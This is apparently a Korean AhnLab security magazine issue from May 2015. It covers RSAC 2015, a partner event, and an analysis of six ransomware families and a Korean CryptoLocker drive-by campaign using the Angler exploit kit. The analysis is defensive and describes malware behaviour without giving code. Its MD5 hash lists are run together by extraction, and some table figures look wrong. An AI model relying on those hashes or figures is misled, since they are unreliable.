Embed Size (px)
Citation preview
1
RSAC 2015
2015. 05
안랩 온라인 보안 매거진
2
3
8
1 2
2 1
2 3
2 7
3 1
3 3
3 4
월간
C O N T E N T S
S p E C i a l R E p O R T
RSAConference 2015
전 세계 보안 기술의 경연장, 그곳에 ‘안랩’이 있다
S p O T l i g h T
AhnLab Partner Base-up Training Day 2015
파트너와 함께 상생의 봄길을 거닐다
h O T i S S u E
1부_ 주요 랜섬웨어 특징과 악성 행위 분석
잔혹한 악의 화신, 랜섬웨어 Top 6
2부_ 크립토락커 상세 분석 정보
한국을 강타한 랜섬웨어 ‘크립토락커’ …어떻게 공격했나
p R O d u C T i S S u E
‘AhnLab 내PC 지키미’ 기반의 통합적인 보안지수화 모델
핫(hot)한 ‘보안지수화’ 사업 모델을 찾는다면?
T h R E aT a N a ly S i S
해외 타깃 공격에 이용된 악성코드 상세 분석
프랑스 국영 TV 해킹 악성코드, 실체를 밝힌다
E x p E R T C O l u m N
소프트웨어와 창의력
i T & l i f E
전문가가 전하는 보안에 대한 ‘오해와 진실’
메모리 해킹 수법과 예방법
a h N l a b N E w S
‘지능형 보안 위협 대응 필요하나 도입은 미진’
안랩 V3, AV–TEST 글로벌 인증 획득
S TaT i S T i C S
2015년 3월 보안 통계 및 이슈
2015. 05
3
안랩, RSA 콘퍼런스 4년 연속 참가
세계 최대 보안 콘퍼런스인 ‘RSAConference 2015(이하 RSAC 2015)’가 지난 4월 20일(현지 시각), 미국 샌프란시스코 모스콘 센터
(Moscone Center)에서 개최됐다. ‘CHANGE: Challenge today’s security thinking’이라는 슬로건을 내건 이번 행사에는 전 세계
3만 3천 여 명의 보안 관계자들과 500여 개 보안 업체들이 참가해 때로는 다양한 기술과 제품으로 치열하게 경쟁하고 때로는 최신 동
향을 공유하는 장이었다.
올해로 이 행사에 4년 연속 참가한 안랩은 ▲APT(Advanced Persistent Threat) 대응 솔루션 ‘안랩 MDS’ ▲PoS 등 특수목적 시스
템 전용 보안 솔루션 ‘안랩 EPS’ ▲원스톱 스마트폰 보안 솔루션 ‘V3 Mobile Security(이하 V3모바일 시큐리티)’ 등 APT 대응부터
모바일 위협까지 최신 보안 동향을 관통하는 솔루션과 기술을 소개했다. 특히 안랩은 “Resolution: Security with Intelligence”라
는 슬로건과 함께 고도화·다변화되는 최신 보안 위협에 대해 기존과는 다른 관점의 대응 방안을 제시해 주목을 받았다.
전 세계 보안 기술의 경연장, 그곳에 ‘안랩’이 있다
올해도 어김없이 샌프란시스코 거리 곳곳의 배너가 RSAC 2015와 안랩(AhnLab)이 돌아왔음을 알렸다. 행사장인 모스콘 센터 주변을 감싸고 있
는 RSAC 배너는 본격적인 행사가 시작되기 전부터 행사 기간까지 총 13일 동안 전세계 보안 담당자들의 시선을 사로잡았다.
RSaC 2015S p E C i a l R E p O R T
3
44
첫날 오프닝 행사를 제외한 실질적인 전시 기간인 3일간 안랩 부스를 찾은 방문객 수는 2천여 명에 달한다. 특히 ‘진화하는 위협, 진일보한 대
응’, ‘위협의 확산, PoS부터 IoT까지’ 등의 주제로 부스에서 진행된 최신 위협 동향과 대응 기술에 대한 프레젠테이션에 이목이 집중됐다.
최신 보안 기술에 대한 심도 있는 정보가 공유된다는 것이 RSAC의 가장 큰 매력이다. 안랩은 30분 간의 브리핑센터(Briefing Center) 발표를
통해 행위기반 탐지에 의존하는 기존의 대응 방식과 달리 독자적인 동적 콘텐트 분석(Dynamic Intelligent Content Analysis, DICA) 기술로
악성 행위의 발생 여부와 상관 없이 알려지지 않은 위협을 사전에 진단하는 방안을 소개했다. 특히 전상현 안랩 선임 연구원은 DICA를 이용해
최근 지속적으로 나타나는 문서형 악성코드를 탐지하는 방법을 시연해 상당한 관심을 받았다.
5
이미 전 세계 보안 전문가들 사이에서 대표적인 APT 대응 솔루션으로 알려진 AhnLab MDS는 올해도 방문객들의 시선을 사로잡았다. AhnLab
MDS는 알려지지 않은(unknown) 파일을 DICA 등 독자적인 기술로 탐지 및 분석하며 ‘실행 보류(execution holding)’ 기능을 통해 사전에 위
협을 차단한다.
PoS(Point–of–Sales) 시스템 등 특수목적의 보안 솔루션인 AhnLab EPS에 대한 문의가 행사 기간 내내 이어졌다. 미국 내에서는 지난 2013
년 말 대형 리테일 업체 해킹 사건을 비롯해 PoS 시스템 보안 침해 사고가 꾸준히 발생하면서 기존과는 다른 대응 방안을 찾아야 한다는 목소리
가 높다. AhnLab EPS는 허가된 프로그램만 실행하도록 하는 화이트리스트 기술을 기반으로, 백신 등을 적용하기 부적합한 PoS 시스템 등에 최
적화된 보안 효과를 제공한다.
6
글로벌 테스트 기관 AV–TEST에서 14회 연속 인증을 획득하는 등 안랩의 모바일 보안 기술은 널리 인정받고 있다. 안랩은 이번 행사에서 지난
4월 구글 플레이스토어를 통해 출시된 V3 Mobile Security를 선보여 악성코드 탐지력은 물론 사생활 보호 등 다양한 기능으로 방문객들의 뜨
거운 호응을 받았다.
이번 행사에서 안랩은 부스 프레젠테이션을 비롯해 동영상, 백서 등 다양한 형태의 콘텐츠로 방문객들의 오감을 만족시켰다. 지난 RSAC 2013
에서 APT를 알기 쉽게 설명한 ‘APTs for Dummies’를 제공한 데 이어 이번 행사에서는 고도화된 익스플로잇 공격을 심층 분석한 백서를 통해
최신 위협 동향을 공유했다.
7
전 세계 보안 담당자들의 곁에는 언제나 안랩이 있다. 반가운 안랩의 이름은 행사장 안팎 곳곳에서 마주칠 수 있었다.
안랩 권치중 대표는 “나날이 교묘한 보안 위협이 증가하고 있는 가운데 안랩의 기술과 솔루션을 세계 최대 규모의 보안 콘퍼런스에서 선보이게
된 것을 의미있게 생각한다”며 “앞으로도 다양한 최신 보안 위협에 효과적으로 대응할 수 있는 전략과 솔루션을 글로벌 시장에 지속적으로 선
보이겠다”고 밝혔다. 안랩은 RSAC 2015에 이어 오는 6월 미국 워싱턴 DC에서 개최되는 가트너 서밋(Gartner Security & Risk Management
Summit)과 베트남, 싱가포르 등 아시아 지역에서 진행되는 다수의 보안 행사에 참가할 예정이다. 이를 통해 글로벌 시장을 다각화하는 한편 각
지역의 유통 채널 발굴을 통해 현지화된 글로벌 사업을 전개하겠다는 전략이다.
8
안랩은 지난 4월, 부여 롯데리조트에서 ‘안랩 파트너 베이스업 트레이닝 데이(AhnLab Partner Base-up Training Day, 이하 베이스업) 2015’
를 개최했다. 베이스업은 총판 및 파트너 역량과 비즈니스 협력 강화를 위해 매년 정기적으로 진행되는 교육 워크숍. 올해에는 4월 3~4일, 10
~11일 2회에 걸쳐 안랩의 네트워크 파트너사와 소프트웨어 파트너사 실무자 300여 명이 참석해, 파트너 비즈니스 활성화를 위한 안랩 사업
전략 소개와 소통의 시간을 가졌다.
고광수 안랩 채널사업본부 상무는 “2014년 한 해에도 파트너 여러분의 노력 덕분에 좋은 성과를 거둘 수 있었다”며 “이번 베이스업은 안랩의
제품, 파트너 정책, 내부 프로세스에 대해 자세히 소개하고, 더불어 파트너 여러분들이 안랩에 바라는 점, 현장에서 직접 들은 고객의 생생한
목소리를 전달해주는 자리가 되기를 바란다”고 말했다. 이어 고광수 상무는 파트너와 고객의 목소리를 안랩의 정책, 제품에 반영하고 피드백
을 느낄 수 있도록 소통을 강화하겠다고 덧붙였다.
안랩은 이번 베이스업에서 주요 전략 제품의 세일즈 시나리오를 공유하고 이를 위한 파트너 정책과 파트너 프로그램을 소개하는데 중점을 두
었다. V3 및 엔드포인트 관리 제품군, 세이프 트랜잭션(AhnLab Safe Transaction), 트러스가드(AhnLab TrusGuard), MDS 등 안랩의 주요 전
략 제품군에 대한 세일즈 포인트 소개와 네트워크 파트너를 대상으로는 파트너 기술지원 간담회가 함께 진행됐다.
ahnlab partner base-up Training day 2015S p O T l i g h T
AhnLab Partner Base-up Training Day 2015
유난히 추웠던 겨울이었다. 날씨만큼이나 경제 상황도 매서웠다. 그래서 더욱 기다린 봄이었다. 잔뜩 물이 오른 나무의 연둣빛 새잎이 돋
아나고, 막 피어나기 시작한 꽃으로 아련한 봄 풍경이 그려진 4월. 안랩은 총판 및 파트너사의 실무자들과 함께 아슴아슴한 백제의 향기
가 가득한 부여로 비즈니스 여행을 떠났다.
파트너와 함께 상생의 봄길을 거닐다
▲ 안랩 파트너 베이스업 트레이닝 데이 2015 현장(左)과 고광수 안랩 채널 사업본부 상무(右)
9
주요 전략 제품의 세일즈 포인트는 이것!
오상언 안랩 제품마케팅팀 부장은 차세대 지능형 위협 대응 솔루션인
안랩 MDS를 소개했다. 안랩 MDS는 ‘탐지–분석–모니터링–대응’
프로세스에 기반하여 네트워크로 유입되는 최초 위협 잠입 단계부터
C&C 서버와의 통신을 통한 2차 감염, 전파 및 내부 정보유출과 같은
최종 단계까지 ‘지능형 위협의 전체 라이프사이클’을 중심으로 위협
에 대한 가시성과 실질적인 대응 체계를 제공한다.
오상언 부장은 “MDS 세일즈를 위해서는 이 제품이 왜 출시되었는지,
그리고 APT라고 불리는 지능형 위협 공격 프로세스에 대한 이해가
필요하다”고 설명했다. 또한 최근 지능형 위협 공격 트렌드는 데이터
유출보다는 랜섬웨어와 같이 하드웨어나 PC 잠금 등이 더 큰 이슈가
되고 있다며, MDS가 이를 어떻게 효과적으로 대응할 수 있는지 집중
소개했다.
특히 오상언 부장은 ▲기존 보안 솔루션 vs. APT 대응 솔루션 ▲망분리 환경에서의 MDS 적용 ▲경쟁사 대비 차별성 ▲이메일 구간에서 APT
솔루션 적용 등 실제 고객의 궁금증을 세일즈 FAQ 형식으로 소개해 파트너 영업대표들로부터 큰 호응을 얻었다.
V3 및 엔드포인트 관리 제품군 소개에 나선 이건용 안랩 제품기획팀 과장은 2015년 V3를 더욱 강력하게 만들어 줄 개선 사항과 엔드포인트
관리 제품을 통한 새로운 비즈니스 기회에 대해 집중적으로 소개했다.
이건용 과장은 “지난해 베이스업에서는 V3의 ‘Smart(사전 방역), Speed(검사 속도), Size(엔진 경량화)’에 대한 오해와 진실을 소개했다. 올해
는 여러분께 V3의 진단율에 대한 오해와 진실을 얘기하겠다”며 AV–TEST가 실시한 테스트 결과에 대해서 자세히 설명했다.
안랩은 글로벌 보안 제품 성능평가 기관인 AV–TEST가 1, 2월 실시한 테스트에서 진단율(Protection), 성능(Performance), 오진 및 사용 편
의성(Usability) 3가지 영역의 기준을 충족해 인증을 획득했다. 특히, 진단율 부문의 실제 환경에 가까운 ‘리얼월드(real–world) 테스트’에서는
평균 95%, 기관이 선택한 대표 샘플 기반 테스트인 ‘프리밸런트(prevalent) 테스트’에서는 평균 100%의 진단율을 기록했다.
이어 이건용 과장은 금융위원회고시 ‘전자금융감독규정’에 따른 가이드로 인해 현재 구체화되고 있는 보안지수화 사업, 개인정보 중앙집중화
사업 등 금융권의 신규 비즈니스 기회를 어떻게 잡을 수 있는지에 대한 구체적인 방안도 제시했다.
안랩은 새로운 기술과 기능을 제품에 구현하는 것 못지않게 고객의 요구 사항을 제품에 반영하는 데에도 노력을 다하고 있다. 가장 대표적인
제품이 안랩의 네트워크 통합 보안 제품인 트러스가드이다.
김현석 안랩 제품기획팀 과장은 “2015년 트러스가드의 목표는 좀더 친절한 제품 만들기이다. 이를 위해 현재 주요 고객과 파트너의 미팅을 진
행하고 있으며, 이렇게 수렴된 의견을 제품에 반영할 계획이다. 또한 이러한 노력은 일회성이 아니라 앞으로도 지속될 것이다”라고 강조했다.
이외에도 안랩은 트러스가드에 ▲스트림 기반 안티바이러스 ▲애플리케이션 콘트롤 탐지 시그니처 고도화 ▲자사 제품과의 연동 강화 등을
통해 성능과 기능 측면에서도 더욱 강력한 제품을 선보일 예정이다.
안랩 트러스가드는 세계적으로 공신력있는 시장조사 기관인 가트너 매직 쿼드런트 ‘엔터프라이즈 네트워크 방화벽’ 부문에 국내 보안 기업으
로는 유일하게 2년 연속 등재된 제품이다.
▲ 오상언 안랩 제품마케팅팀 부장
▲ 안랩 제품기획팀 이건용 과장(左)과 김현석 과장(右)
10
백민경 안랩 제품마케팅팀 차장은 온라인 서비스 환경의 보안 위협을 설명하고, 이에 대한 해결책으로 최근 출시한 안랩 세이프 트랜잭션
(AhnLab Safe Transaction)을 소개했다.
백민경 차장은 “전자금융거래를 비롯한 인터넷 서비스 환경을 노리는 악의적인 공격의 위험성이 증대되고 이로 인해 사용자의 보안 환경은 저
해될 수밖에 없다. 특히 관련 규정의 변경으로 기업의 자율성과 함께 책임도 증가하는 추세이다. 따라서 기업들은 보안성과 편의성을 모두 충
족하는 보안 솔루션이 필요하다”고 설명했다.
안랩 세이프 트랜잭션은 차세대 해킹 방지 솔루션으로 ▲온라인 키보드 보안 ▲악성코드 탐지 ▲네트워크 보호 ▲콘텐츠 위변조 방지 ▲메모
리 보호 및 해킹 방지 등의 다양한 기능을 제공한다.
▲ 안랩 세이프 트랜잭션의 세일즈 전략을 소개 중인 백민경 제품마케팅팀 차장
▲ 안랩과 파트너사 실무자들이 1박 2일 동안 공유와 소통의 시간을 가졌다.
11
고광수 상무는 “안랩은 2015년 파트너 비즈니스를 통해 질적 성장과 양적 성장을 모두 이루어낼 것이다”라며 “이를 위해 영업 효율성, 수익성
개선 프로그램과 프로세스를 발굴하고 지원할 계획이다”라고 밝혔다. 또한 “이 자리에서 그치는 것이 아닌 올해 내내 파트너와 고객을 찾아가
는 비즈니스, 그리고 그 목소리에 귀 기울이는 노력을 지속할 것이다”라고 덧붙였다.
베이스업에 참가한 파트너사 실무자들은 안랩 전략 제품의 세일즈 포인트에 대해 이해할 수 있는 유익한 자리였다고 평가하고, 원활한 교류를
할 수 있는 다양한 프로그램을 지속적으로 마련해 줄 것을 요청했다.
멀리 가기 위해 함께 간다!
안랩 베이스업의 특징 중 하나는 안랩의 제품 교육뿐만 아니라 전국 각지에 있는 파트너사들이 모여 1박 2일 동안 화합과 소통의 자리를 가졌
다는 것이다. 안랩과 파트너 담당자가 함께 조를 이뤄 참가하는 팀빌딩 프로그램인 안랩 퀴즈 빙고를 통해 제품 교육에 대한 이해도를 높이고,
서로에 대한 친밀감을 강화했다. 또한 아웃도어 액티비티 프로그램인 부소산성과 백제문화단지 투어도 참가자들로부터 큰 호응을 얻었다.
▲ 안랩과 파트너사 실무자들은 더욱 강력한 ‘파트너십’을 바탕으로 2015년 성공적인 비즈니스를 이끌겠다고 다짐했다.
12
Ransomwareh O T i S S u E
12
국내도 랜섬웨어 비상이 걸렸다. 이미 해외에서는 수년 전부터 등장한 공격 수법이었으나 그 동안 국내에서는 큰 영향이 없었다. 그
러나 최근 랜섬웨어의 일종인 크립토락커(CryptoLocker)의 한글 버전이 국내 웹 사이트에서 유포되면서 랜섬웨어에 대한 우려가 높
아지고 있다. 이 글에서는 주요 랜섬웨어를 분류해 각각의 특징과 행위를 소개하고자 한다. 분류 및 우선 순위는 국내외 이슈 정도(고
객사 접수, 뉴스 기사, 포스팅 등)와 진단 건수를 기반으로 하였으며, 대상 기간은 2014년 10월부터 2015년 3월까지이다.
1부_주요 랜섬웨어 특징과 악성 행위 분석
잔혹한 악의 화신, 랜섬웨어 Top 6
랜섬웨어(Ransomware)는 ransom(몸값)과 software(소프트웨어)의
합성어로 컴퓨터 사용자의 문서를 ‘인질’로 잡고 돈을 요구한다고 해
서 붙여진 명칭이다. 즉, 사용자 시스템에 설치된 후 파일을 암호화해
서 정상적으로 사용하지 못하도록 하고 이를 정상화해준다는 조건으
로 비트코인 또는 추적이 어려운 전자 화폐를 통한 금액 지급을 요구
하는 악성코드이다.
랜섬웨어 Top 6 분류 및 특징
랜섬웨어 가운데 최근 V3 진단 수에서 큰 비중을 차지하고 기사화 등
으로 이슈가 되는 것에 대해 [표 1]과 같이 총 6개로 분류할 수 있다.
좀 더 넓게 구분하자면 ‘나부커 (Nabucur)’와 그 외의 랜섬웨어 류로
나눌 수 있다. 그 차이의 기준은 나부커는 인코딩한 원본 파일에 감염
코드를 추가해서 정상 파일을 변경하는 방식으로 V3에서는 해당 파
일들을 원본 파일로 복원할 수 있다. 반면, 나머지 종류의 랜섬웨어는
RSA나 AES 같은 암호화 기법을 사용하여 원본 파일로 복원하기 위해
선 복호화 키가 필요하다. 그리고 실제 동작을 살펴보면 비슷한 부분이
많다는 걸 알 수 있다.
FAMILY MD5
1
Nsb락커 /
나부커
(NsbLocker /
Nabucur)
4DDE0233CD956FAA19FF21B3FB73FBBDED42954A5824A5DD1E579168480191B2770D3BC32F7ACA8F94DD22209532A35219840868F8D20089BA4CE289F48A6A09DC5BAD327EF50D2594F423A1DF7A6C03FF6CAFE7597BD6FF1521A1A1F817D9BF
2
CtB락커 /
크리트로니
(CtBLoCkEr /
CritroNi)
vDEFB9614AFA1DA0D0057C80AACBCA7F0D0C3CE7B8B99D4B4278CE3E3CECE33E9E89F09FDDED777CEBA6412D55CE9D3BCF420BDEB156FDB2F874A1E5D51E9D65FFEC68D340ED13292701404E438059FB714C0558C757C93465ECCBBD77D58BBF3
3크립토락커
(CryptoLocker)
0204332754DA5975B6947294B2D64C926FE47DC2BDB86B0FC28017FC6A67B1F9v0E1543914E129FF069D1079695115FE90DF492989EEA14562EE2E8C880EEDDB6419ECEC2051479609ADED0C173619DF804FB36199787F2E3E2135611A38321EB
1313
[표 2] 주요 랜섬웨어 특징
구분 프로토콜 암호화 주요 타깃 구현 방식 결제 방식 몸값
1 Nsb락커 /
나부커tCP PoLymorPhiC
DoC/EXE/imAgE/mEDiA
PoLymorPhiC BitCoiN 250 USD
2 CtB락커 /
크리트로니httPS/tor AES, ECDh DoC/imAgE oPENSSL BitCoiN 0.5 USD
3 크립토락커 httP AES, rSA DoC/imAgE mS CryPto APi BitCoiN 300 USD
4크립토월 /
크립토디펜스httP/tor rSA DoC/imAgE mS CryPto APi BitCoiN 500 ~ 1000 USD
5토렌트
락커httPS AES DoC/imAgE oPENSSL BitCoiN 0.8 BtC
6테슬라
크립트httPS/tor AES, ECC
gAmE/DoC/imAgE
oPENSSLBitCoiN,PAyPAL
500~1000 USD
각 랜섬웨어의 특징은 [표 2]와 같이 정리할 수 있다. 가장 큰 특징은
앞서 언급한 것처럼 나부커에서는 암호화 기법을 사용하지 않았으며
공격 대상 파일에 ‘.exe’ 파일이 있다는 것이다. 그리고 공통적으로 모
든 종류에서 비트코인을 이용해 사용자의 결제를 유도하는 것을 확인
할 수 있다.
이들 랜섬웨어가 발생한 시기를 타임라인으로 정리하면 [그림 1]과 같
다. 최근에 발견된 ‘테슬라크립트(TeslaCrypt)’는 공격 대상 파일을 문
서나 이미지 파일 뿐만 아니라 게임 관련 파일들도 대상에 포함된 것
이 특징이며, 이메일로 유포되는 ‘Ctb락커(CtbLocker)’ 류는 최근에
다시 확산되고 있다.
4
크립토월 /
크립토디펜스
(CryptoWall /
CryptoDefense)
31C2D25D7D0D0A175D4E59D0B3B2EC940650C9045814C652C2889D291F85C3AEB6C7943C056ACE5911B95D36FF06E0E4A9927372ADB1BBAB4D9FEDA4973B99BB73A9AB2EA9EC4EAF45BCE88AFC7EE87E
5
토렌트락커
(torrentLocker)
7D1D5E27C1C0CB4ABCC56FA5A4A16744253491AD824E156971C957CD152548444A96F22E4FFDBCF271FF4EB70B1320ED86296FB3DDD46431DDFE8A48D6FB165C6694617DAB8CD78630AA0A3E002E519771C066D831A5749685747B33CB9588A8
6테슬라크립트
(teslaCrypt)
01ADE9C90D49AF3204C55D201B466C1B0FF2BE71B46C129EF8905B41E60C2AB003C1A14C715E3A41F36B026A11A1BCB40C64ADDB8FE2ED5B029D9337E0E2FBA00AFBAEE4802BB74F9AC366579921F2B40C27082138728BC2AACE00263396ADDA
랜섬웨어 Top 6 기능 분석
Nsb락커 / 나부커
나부커 악성코드에 대해서는 2015년 2월 11일자 안랩 ASEC 블로
그(asec.ahnlab.com/1025)에 ‘원본 파일 복원이 가능한 랜섬웨어
(NSB: National Security Bureau)’ 제목으로 소개한 바 있다. 해당
악성코드에 감염되면 시스템에 있는 이미지 파일(*.bmp, *.gif, *.jpg,
*.png), 문서 파일 (*.doc, *.ppt, *.xls), 미디어 파일(*.mp3, *.wma)뿐
만 아니라 실행 파일(*.exe)과 압축 파일(*.rar, *.zip)도 공격 대상이 된
다. 이 파일들은 원본 파일을 인코딩된 형태로 백업하고 이는 실행 파
일로 변경되는데 이와 같이 원본 파일들을 ‘AES’, ‘RSA’ 같은 암호화 방
법으로 변경한 것이 아니기 때문에 백신으로도 복원이 가능하다. 그리
고 변경된 실행 파일에는 백업된 원본 파일 뿐만 아니라 나부커 감염
코드도 포함되어 있기 때문에 그 자체가 다시 다른 파일들을 감염시키
는 나부커 랜섬웨어 악성코드가 된다.
[그림 2]에서 볼 수 있듯이 나부커에 의해 감염된 파일이 실행되면 실
행 파일 2개를 ‘%User%’와 ‘%ALLUser%’ 폴더에 생성하는데 이 파일
은 쓰레드 형태로 기능을 수행하면서 C&C 접속과 시스템 내의 특정
확장자를 가진 파일들을 감염시킨다. 그리고 최종적으로 감염된 시스
템의 화면을 금전을 요구하는 화면으로 바꾼다.
[그림 2] Nsb락커 / 나부커 동작 흐름
[그림 3] Nsb락커 / 나부커 감염 화면
Ctb락커 / 크리트로니
2014년 7월에 공개된 랜섬웨어 Ctb락커(CtbLocker)는 ‘크리트로니
(Critroni)’라는 이름으로도 알려졌으며 스팸메일로 유포되는 다운로더
에 의해서 생성 및 실행된다. 첨부 파일에 포함되어 있는 다운로더는
‘.zip’ 또는 ‘.cab’ 형태로 압축되어 유포된다. 압축 해제된 파일은 ‘.scr’
확장자를 가지고 있다. 실행을 하면 ‘%TEMP%’폴더에 정상 ‘.rtf’ 파일
을 생성/실행해서 마치 문서 파일처럼 위장하지만 백그라운드에서는
사용자 몰래 악성코드를 다운로드한다.
[표 1] 주요 랜섬웨어 분류
[그림 1] 주요 랜섬웨어 타임라인
1414
다운로드된 파일은 랜섬웨어 악성코드로 오피스 문서 파일들뿐만 아니
라 이미지와 소스파일 그리고 기타 파일들을 암호화 대상으로 하고 완
료 후에는 Ctb락커에 대한 메시지와 함께 비트코인을 요구하는 페이
지를 화면에 보여 준다.
96시간 내에 돈을 지급하지 않으면 데이터를 복구할 수 없다는 메시지
를 보여주고 해당 시간이 모두 지나거나 컴퓨터 시간을 임의로 이후 시
간으로 조작하면 [그림 6]과 같이 만료(expire) 화면이 나타난다.
[그림 4] Ctb락커 / 크리트로니 동작 흐름
[그림 5] Ctb락커 감염 화면
[그림 6] Ctb락커 만료 화면
[그림 7] 크립토락커 동작 흐름
[그림 8] 크립토락커 감염 화면
이 랜섬웨어는 자신을 레지스트리에 자동 실행하도록 등록해 놓는데
등록된 이름이 ‘크립토락커(CryptoLocker)’로 되어 있는 것이 특징이
다. C&C서버에 접속해서 공개키(Public Key)를 받아온 후에 시스템의
파일들을 암호화하는데 현재는 해당 서버들이 다운되어 있는 상태이므
로 랜섬웨어 기능이 동작하지는 않는다.
크립토락커
2013년 9월에 최초 발견된 크립토락커(CryptoLocker)는 Ctb락커
와 마찬가지로 스팸메일의 첨부 파일 형태 또는 P2P 방식의 ‘게임오
버 제우스(Gameover Zeus)’ 봇넷 악성코드를 통해서 유포되며 문
서와 이미지 파일들을 암호화하였다. 이를 정상화하고 싶으면 머니팩
(MoneyPak)이나 비트코인을 통한 결제를 요구한다.
2014년 8월, 글로벌 보안 전문가들이 ‘Tovar’ 오퍼레이션을 통해 이 악
성코드 제작자의 C&C 서버를 다운시키고 서버에 저장된 복호화 키를
다수 획득함으로써 현재는 암호화된 파일 상당수를 이전의 상태로 복
구할 수 있게 되었다. 해당 기간까지 전세계 약 50만 대의 시스템이 크
립토락커에 감염된 것으로 보고되었다.
크립토월/크립토디펜스
크립토월은 전체적인 동작 흐름이 앞서 설명한 크립토락커와 비슷하
다. 둘 다 하위 프로세스를 생성한 후 PE 이미지를 인젝션시켜서 동작
하며, C&C 서버로부터 공개키를 받아온 후 랜섬웨어 기능을 실행한다.
1515
토렌트락커
토렌트락커(TorrentLocker) 역시 앞에 설명한 크립토락커, 크립토월
과 비슷한 동작을 하며 코드가 진행되는 부분도 매우 비슷하다. 단
“HKCU\Software\Bit Torrent Application\configuration” 레지
스트리에 암호화한 파일리스트를 등록하는 특징이 있어서 토렌트락커
(TorrentLocker)라고 명명하게 되었다고 한다.
[그림 9] 크립토월 동작 흐름
[그림 11] 토렌트락커 동작 흐름
[그림 13] 테슬라크립트 동작 흐름
[그림 10] 크립토월 감염 화면
[그림 12] 토렌트락커 감염 화면
테슬라크립트
테슬라크립트(TeslaCrypt)는 게임 기능과 저장 데이터를 공격하는 랜
섬웨어 류로, 아이프레임(iframe) 대신 태그(div)를 이용한 플래시 플
레이어 취약점을 통해 일반 사용자 PC에 설치된다. 구조는 크립토락커
(CyptoLocker)와 유사하지만 문서 파일뿐만 아니라 게임 관련 파일(프
로필, 세이브, 데이터, 지도, 모드 등)도 암호화한다는 차이가 있다.
테슬라크립트는 크립토락커와는 다르게 네트워크 접속은 사용자 PC
의 비트코인 접속 주소를 전달하기 위해 사용되며, %AppData% 폴더
에는 암호화한 파일 리스트를 가지고 있는 ‘log.html’ 파일과 복호화할
때 사용하는 ‘key.dat’ 파일이 저장된다. 그리고 바탕화면에 생성되는
‘HELP_RESTORE_FILES.txt’ 파일에는 암호화된 파일을 풀기 위해 비
트코인을 지급하는 과정이 설명되어 있다.
1616
랜섬웨어 악성코드에 사용자 PC가 감염되면, 화면으로 PC가 감염되었
음을 사용자에게 알려주고 이를 정상화하려면 돈을 지급하라는 내용에
사용자들은 혼란을 겪는다. 당장 PC를 사용할 수 없을 뿐만 아니라 내
부에 중요한 파일들이 있다면 다른 뚜렷한 해결책이 없는 상황에서는
사용자들이 결제를 선택할 수밖에 없을 것이다. 그렇다고 실제 돈을 지
급했을 때 시스템이 원래대로 돌아온다고 확신할 수도 없다. 그렇기 때
문에 해당 악성코드에 PC가 감염되는 것을 애초에 방지하는 것이 가장
좋은 방법인데 그러기 위해서는 발신자가 명확하지 않은 이메일에 포
함된 의심스러운 파일들을 실행하지 말아야 한다. 또한 PC에 사용 중
인 백신을 항상 최신의 상태로 업데이트하고, OS와 애플리케이션 공급
업체에서 제공하는 패치를 최신 버전으로 유지하는 것이 중요하다.
[그림 14] 테슬라크립트 감염 화면
17
Ransomwareh O T i S S u E
17
최근 국내 유명 인터넷 커뮤니티 사이트를 통해 랜섬웨어의 일종인 크립토락커가 유포되었다. 그동안 국내에서 발견된 랜섬웨어와는
달리 한글로 되어 있으며, 한국의 인터넷 커뮤니티에서 유포된 점을 보아 한국의 사용자를 표적으로 했음을 알 수 있다. 이 글에서는
최근 이슈가 된 한글로 된 ‘크립토락커’에 대한 상세 분석 정보를 소개하고자 한다.
2부_크립토락커 상세 분석 정보
한국을 강타한 랜섬웨어 ‘크립토락커’…
어떻게 공격했나
최근에 발견된 크립토락커(CryptoLocker)는 [그림 1]에서 확인
할 수 있듯이 지난 2013년 9월에 처음 발견되었다. 이 외에 크립
토월(CryptoWall), 토렌트락커(TorrentLocker), 크립토그래픽락커
(CryptographicLocker), 테슬라크립트(TeslaCrypt) 등의 랜섬웨어도
지속적으로 나타났다. 주로 이메일을 통해 유포되던 랜섬웨어 악성코
드가 최근 국내 인터넷 커뮤니티 사이트를 이용해 유포되었고 해당 랜
섬웨어인 크립토락커도 과거의 그것들과 같은 류이다.
최근 이슈가 된 한글 크립토락커에 감염되면 [그림 2]와 같은 화면이
나타나며, 암호화된 파일들을 복원하기 위해 한화 약 438,900원의 비
트코인을 요구한다. 피해자들이 쉽게 비용을 지급할 수 있도록 결제
[그림 1] 주요 랜섬웨어 타임라인
[그림 2] 크립토락커 감염 화면
방법을 상세하게 설명하고 있으며 실제 복원이 가능함을 증명하기 위
해 암호화된 파일 중 1개의 파일을 무료로 복호화해준다. 이를 통해
악성코드 제작자는 중요한 파일을 암호화하여 사용자에게 금전을 유
도하고 있다.
1818
그리고 사용자 PC의 IP 대역을 확인해서 해당 국가에 맞는 언어의 안
내 페이지를 생성 및 실행하여 보여 준다. 결제를 진행하기 위해 안내
된 링크를 클릭하면 아래와 같은 정보가 기본으로 세팅되어 있는데,
Tor(익명의 분산형 네트워크)를 사용해서 네트워크 추적을 어렵게 해
놓았다.
(예) http://zoqowm4kzz4cvvvl.torlocator.org/jxt85f9.php
- User-Code: 12lrne9
- User-Pass: 8394
감염 경로
이번에 국내에 유포된 크립토락커는 사용자 시스템의 취약점을 이용한
전형적인 웹 기반의 DBD(Drive-By-Download) 방식을 통해 감염이
이루어졌다. 국내에서 많은 사용자들을 보유한 유명 커뮤니티 사이트
에 접속하면 취약한 사이트로 리다이렉션(Redirection)되면서 특정 취
약점에 의해 랜섬웨어 악성코드가 다운로드되고 실행되었다.
최초 유포지 및 경유지
이번 랜섬웨어 악성코드 배포에는 국내 3곳의 대표적인 IT 커뮤니티가
악용되었다.
(1) C업체
(2) S업체
(3) R업체
이들 국내 사이트에는 광고 데이터를 동적으로 받아서 화면에 보여주
는 기능이 포함되어 있다. 공격자는 이 기능을 악용하여, [그림 4]와 같
이 광고 서버에 악의적인 스크립트를 삽입하거나 직접 사이트를 변조
하는 방법으로 사용자들이 인지하지 못한 채 악의적인 사이트로 연결
되도록 유도하였다.
특히, 삽입된 악성 스크립트들은 경유지 사이트를 거쳐, 최종적으로
취약점 공격코드가 탑재된 사이트로 연결된다. 이때 사용자 클라이
언트 시스템 상의 취약점을 이용하기 위해 자동화된 웹 공격 툴킷인
‘Angler EK’가 사용되었다.
이들 취약점을 이용해 셸코드 실행 시, 공격자 사이트로부터 추가적인 페
이로드(Payload)를 다운로드받는다. 이를 해당 키(KEY) 문자열로 해제
한 후, 페이로드의 시작이 “9090” 또는 “MZ”인지 구별하여 직접 메모
리 상에서 실행하거나 tmp 파일(%temp%폴더)로 생성하여 실행한다.
[그림 3] 감염 경로
